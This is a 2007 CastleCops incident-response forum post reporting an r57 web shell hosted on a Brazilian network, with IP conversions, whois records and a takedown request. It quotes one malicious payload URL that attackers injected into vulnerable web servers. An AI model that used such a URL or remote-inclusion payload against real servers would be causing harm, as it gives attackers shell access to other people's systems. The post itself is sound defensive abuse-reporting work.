CastleCops® [WsIRT#273] r57shell @AS28604

Need help? Click here to register for free! Absolutely zero advertisements on this site!

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Forum FAQ

Usergroups

Profile

Select FavForums

[WsIRT#273] r57shell @AS28604

All -> FavForums -> WsIRT Reports

[del.icio.us!] [digg it!] [reddit!]

View previous topic :: View next topic

Author

Message

Paul

CastleCops Founder

Joined: Feb 22, 2002
Posts: 27351

Posted: Fri Nov 30, 2007 2:54 am Post subject: [WsIRT#273] r57shell @AS28604

Attack Alert

Full Report: CastleCops Link /r57shell_attack273.html

Changed status to confirmed attack.

IP Converted: 201.7.184.2

dword = 3372726274
hex1 = 0xc907b802
hex2 = 0xc9.0x7.0xb8.0x2
oct = 0311.07.0270.02

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: KIT.NET
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Referral URL: http://www.register.com
Name Server: NS01.GLOBO.COM
Name Server: NS02.GLOBO.COM
Status: clientTransferProhibited
Updated Date: 28-aug-2006
Creation Date: 09-jan-1997
Expiration Date: 08-jan-2011

>>> Last update of whois database: Fri, 30 Nov 2007 02:49:46 UTC <<<

Registrant:
TV Globo Ltda.
--- ---
Rua Lopes Quintas, 303
Rio de Janeiro, BR 22460-1058

Email: regina.sampaio@tvglobo.com.br

Registrar Name....: REGISTER.COM, INC.
Registrar Whois...: whois.register.com
Registrar Homepage: www.register.com

Domain Name: kit.net

Created on..............: Thu, Jan 09, 1997
Expires on..............: Sat, Jan 08, 2011
Record last updated on..: Mon, Jul 23, 2007

Administrative Contact:
TV Globo Ltda.
--- ---
Rua Lopes Quintas, 303
Rio de Janeiro, BR 22460-1058

Phone: +1.552125401058
Email: regina.sampaio@tvglobo.com.br

Technical Contact:
Registercom
Domain Registrar
575 8th Avenue
New York, NY 10018

Phone: +1.9027492701
Email: domainregistrar@register.com

DNS Servers:

ns02.globo.com
ns01.globo.com

View CIDR AS28604 Report: http://www.cidr-report.org/cgi-bin/as-report?as=28604

"28604 | BR | lacnic | 2005-07-14 | TV GLOBO LTDA"<br />

Extended information for AS28604:
State/Province:
Country: br
Responsible Domain: corp.globo.com
Abuse Email: carolo@corp.globo.com

Attackers are probing vulnerable web servers and then injecting this script from this server. This is the r57 shell script that gives attackers shell access to the exploited remote web server. Please have this script removed as soon as possible.

Quote:

http://l1nk3d.kit.net/r57.1??

	All -> FavForums -> WsIRT Reports	All times are GMT
Page 1 of 1

You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 146ppm 0.409s (0.059s) Making cybercriminals unhappy since 2002*